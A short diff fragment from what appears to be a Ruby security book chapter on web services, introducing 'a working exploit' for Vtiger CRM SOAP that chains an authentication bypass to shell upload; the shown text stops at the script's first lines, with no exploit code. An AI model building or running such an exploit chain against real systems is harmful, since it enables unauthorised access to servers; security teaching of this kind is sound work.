rubyfu/RubyFu/module_0x4__web_kungfu/web_services.md

 ```

-This is a working exploit for
+This is a working exploit for Vtiger CRM SOAP from Auth-bypass to Shell upload
 ```ruby
 #!/usr/bin/evn ruby
 #